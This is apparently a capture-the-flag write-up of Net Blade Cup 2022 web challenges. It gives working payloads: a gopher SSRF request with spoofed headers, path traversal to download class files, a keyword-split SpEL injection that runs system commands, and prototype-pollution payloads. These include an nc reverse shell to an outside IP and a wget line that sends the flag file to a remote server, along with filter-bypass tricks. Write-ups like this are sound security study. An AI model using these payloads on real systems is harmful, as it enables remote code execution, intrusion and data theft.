Net Blade Cup 2nd 2022 web

Sign_in

File protocol reads /etc/hosts to get intranet ip
http://probe intranet host

Follow the prompts to pass the parameters, add the http header, and use gopher to send the post data

http://124.220.9.19:8091/?url=gopher://172.73.23.100:80/%5f%50%4f%53%54%25%32%30%2f%25%33%46%61%25%33%44%31%25%32%30%48%54%54%50%2f%31%2e%31%25%30%44%25%30%41%48%6f%73%74%25%33%41%31%37%32%2e%37%33%2e%32%33%2e%31%30%30%25%30%44%25%30%41%58%2d%46%6f%72%77%61%72%64%65%64%2d%46%6f%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%4f%72%69%67%69%6e%61%74%69%6e%67%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%52%65%6d%6f%74%65%2d%49%50%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%58%2d%52%65%6d%6f%74%65%2d%41%64%64%72%25%33%41%25%32%30%31%32%37%2e%30%2e%30%2e%31%25%30%44%25%30%41%52%65%66%65%72%65%72%25%33%41%25%32%30%62%6f%6c%65%61%6e%2e%63%6c%75%62%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%74%79%70%65%25%33%41%25%32%30%61%70%70%6c%69%63%61%74%69%6f%6e%2f%78%2d%77%77%77%2d%66%6f%72%6d%2d%75%72%6c%65%6e%63%6f%64%65%64%25%30%44%25%30%41%43%6f%6e%74%65%6e%74%2d%6c%65%6e%67%74%68%25%33%41%25%32%30%33%25%30%44%25%30%41%25%30%44%25%30%41%62%25%33%44%31%25%30%44%25%30%41

upload

Modify the content-type to ctf to upload files with any suffix. The php file is not parsed in the upload directory, and the file name has SQL injection.

. The flag cannot be read by directly guessing the table name and column name

ez_java

Read any regular file, download web.xml and then go to the class file

http://124.220.9.19:8022//download?filename=../../..//classes/com/abc/servlet/TestServlet.class

Obviously a spel injection

When parsing the expression, the second parameter parseContext is passed in, which is a parameter of the ParserContext class, which defines the identifier of the SPEL expression

The payload is constructed by reflection and split keywords, and the calculator is successfully played locally

#{
    
    T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{
    
    "cmd","/C","calc"})}

Rebound shell urlencode directly

ezjs (reproduce)

Prototype chain pollution, at first glance Ding Zhen, in fact, it is the code-breaking thejs published by P God in 2018. A blacklist has been added to this topic.
{"__proto__":{"sourceURL":"\u000aglobal.process.mainModule.constructor._load('child_process').exec('nc 120.27.246.202 8888 -e /bin/sh',function(){});"}}

If I test this question, exec space; the number is gone;
js is not familiar with it, but I didn’t make it. After the game, I found that it is similar to python ssti spel bypassing keyword filtering and splitting the string. The space can be closed with $IFS$9 semicolon with // instead of closing statement

{
    
    
	"__proto__":{
    
    
		"sourceURL":
		"\nglobal.process.mainModule.constructor._load('child_process')['ex'+'ec']('wge'+'t$IFS$9http://vps地址/\u0060ta\\c$IFS$9/.[f]lag\u0060')//"
		}
}